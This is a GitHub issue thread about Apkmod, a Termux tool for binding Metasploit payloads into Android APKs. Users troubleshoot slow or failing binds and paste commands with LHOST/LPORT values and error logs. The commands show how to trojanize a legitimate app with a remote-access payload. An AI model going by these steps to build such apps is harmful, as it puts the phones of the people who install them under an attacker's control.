Closed Chingo-X closed 5 years ago
You should try -a
option for example apkmod -a -b yourapk.apk -o output.apk lhost=? lport=?
Btw what's name of original app ?
You should try
-a
option for exampleapkmod -a -b yourapk.apk -o output.apk lhost=? lport=?
Btw what's name of original app ?
Well I used same ur code with -a as u typed here and still says same bug
Note : why it's always takes very much time ? I just using app 3 mbs only to binding payload and take like 2 hrs it's normally ?
2 hrs ? No it's not normal and please give your app-release.apk
[app-release.zip](https://github.com/Hax4us/Apkmod/files/3674509/app-release.zip
Closed via https://github.com/Hax4us/Apkmod/commit/c1b151972934324f8615c72f60684a678c20b24a
Update apkmod by apkmod -u
and don't forget to use -a
option
Try this before binding rm $PREFIX/share/TermuxAlpine/root/.local/share/apktool/framework/1.apk
Then bind with -a
Now do apkmod -u
And no you can't use tmux bunch on your pie
First thing, this code giving me error rm $PREFIX/share/TermuxAlpine/root/.local/share/apktool/framework/1.apk Cuz no .Local path even, I checked even with ls -alt to see if it's hidden or not And I update and its not binding even
I can't reproduce your problem as It's working well in my device
Can you do like this and give screenshot here
sh -x $(which apkmod) -a -b .........
This everything And I found another user have same my probs .
I did not say to execute/copy my example
You must do like sh -x $(which apkmod) -a -b yourap.apk -o bind.apk lhost=? lport=?
How to fully uninstall the tool ?
just do
rm $(which apkmod)
rm -rf $PREFIX/share/TermuxAlpine
rm -f $HOME/setup.sh
I did not say to execute/copy my example You must do like
sh -x $(which apkmod) -a -b yourap.apk -o bind.apk lhost=? lport=?
just do
rm $(which apkmod)
rm -rf $PREFIX/share/TermuxAlpine
rm -f $HOME/setup.sh
I tried to fully clear and reinstall it again but same and up to 3hrs
@Chingo-X what's the output of termux-info
@Chingo-X what's the output of
termux-info
Here u are
i am also facing an issue like jt shows this msg when i bind
apkmod -a -b /sdcard/gps.apk -o /sdcard/pc/binded.apk LHOST=192.168.I.101 LPORT=4444 [] Binding /storage/emulated/0/gps.apk /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead. Using APK template: /storage/emulated/0/gps.apk Error: The following options failed to validate: LHOST. [!] Try again with -a option But if still can't bind, take screenshot and open a issue on github $ apkmod -a -b /sdcard/gps.apk -o /sdcard/pc/binded.apk LHOST=127.0.0.1 LPORT=4444 [] Binding /storage/emulated/0/gps.apk /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead. Using APK template: /storage/emulated/0/gps.apk [*] Decompiling original APK..
the same msg dsplye when i use msfconsole installed by ur script .
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
@Baloch121 your lhost is invalid as you can see the same in error
@Chingo-X can you test now after updating to version 1.4
@Baloch121 your lhost is invalid as you can see the same in error @Chingo-X can you test now after updating to version
1.4
Still getting errors
I committed some changes ( only for aarch64 ) today , can you update again by apkmod -u
If you have any other arch instead of aarch64 then wait , I will also upload aapt2 for all rest archs with in 24 hour
I committed some changes ( only for aarch64 ) today , can you update again by
apkmod -u
If you have any other arch instead of aarch64 then wait , I will also upload aapt2 for all rest archs with in 24 hour
I am arm
However this is after update
i am arm
Done now you can update
i am arm
Done now you can update
Finally it's done on this APK !!!! But I still need to test another apps ! Also it's still takes long time to compile but np it's working !
Is anyone know how to solve this prob..im so confuse...i cant rebuild the metasploit android payload after i decompile it (btw i didnt do any changes after i decompile the apk)
After ~ 1h and 30 mins for binding apk only 3 mbs it failed .
Any solve plz ? Thanks